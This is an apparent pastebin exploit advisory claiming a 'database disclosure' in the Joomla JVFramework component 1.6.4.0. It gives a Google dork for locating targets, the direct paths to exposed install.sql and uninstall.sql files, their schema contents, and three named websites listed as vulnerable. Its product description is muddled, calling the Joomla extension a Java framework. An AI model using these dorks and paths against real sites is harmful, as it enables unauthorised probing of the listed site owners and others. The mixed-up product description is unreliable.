ZSK5XtxQ

· 7 years ago · Jan 19, 2019, 12:04 AM
1####################################################################
2
3# Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure
4# Author [ Discovered By ] : KingSkrupellos
5# Team : Cyberizm Digital Security Army
6# Date : 19/01/2019
7# Vendor Homepages : joomlavi.com ~ jvframework.com
8# Software Download Link : 
9bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/
10# Software Information Link : sourceforge.net/projects/jvframework/
11# Software Affected Version : 1.6.4.0
12# Tested On : Windows and Linux
13# Category : WebApps
14# Exploit Risk : Medium
15# Google Dorks : inurl:''/administrator/components/com_jvframework/''
16# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
17CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
18CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
19
20####################################################################
21
22# Description :
23**************
24*JV Framework brings you the power to handle your website in the most elegant way.
25*JV Framework has got the first-time deployed Drag and Drop feature.
26*JVFramework is an application framework for Java. It's main goal is to avoid code duplication 
27(such as metatada, UI programming, etc) related to the construction of a 
28web application, providing a declarative language for business tier programming.
29
30####################################################################
31
32# Database Disclosure Exploit :
33***************************
34
35/administrator/components/com_jvframework/installation/install.sql
36/administrator/components/com_jvframework/installation/uninstall.sql
37
38####################################################################
39
40# Information : [ uninstall.sql ] => 
41************
42-- --------------------------------------------------------
43DROP TABLE IF EXISTS `#__jv_themes`;
44-- --------------------------------------------------------
45DROP TABLE IF EXISTS `#__jv_theme_assign`;
46
47*******************************************
48
49# Information : [ install.sql ] => 
50
51-- -------------------------------------------------------------
52
53CREATE TABLE IF NOT EXISTS `#__jv_themes` (
54  `id` int(11) NOT NULL AUTO_INCREMENT,
55  `theme` varchar(50) NOT NULL,
56  `home` tinyint(1) NOT NULL,
57  `params` varchar(10240) NOT NULL,
58  `published` tinyint(1) NOT NULL DEFAULT '0',
59  PRIMARY KEY (`id`)
60) ENGINE=MyISAM  DEFAULT CHARSET=utf8;
61
62-- -------------------------------------------------------------
63
64CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (
65  `id` int(11) NOT NULL AUTO_INCREMENT,
66  `menuid` int(11) NOT NULL,
67  `themeid` int(11) NOT NULL,
68  PRIMARY KEY (`id`)
69) ENGINE=MyISAM  DEFAULT CHARSET=utf8;
70
71####################################################################
72
73# Example Vulnerable Sites :
74*************************
75
76[+] legacyshare.org/administrator/components/com_jvframework/installation/install.sql
77
78[+] mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql
79
80[+] lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql
81
82####################################################################
83
84# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 
85
86####################################################################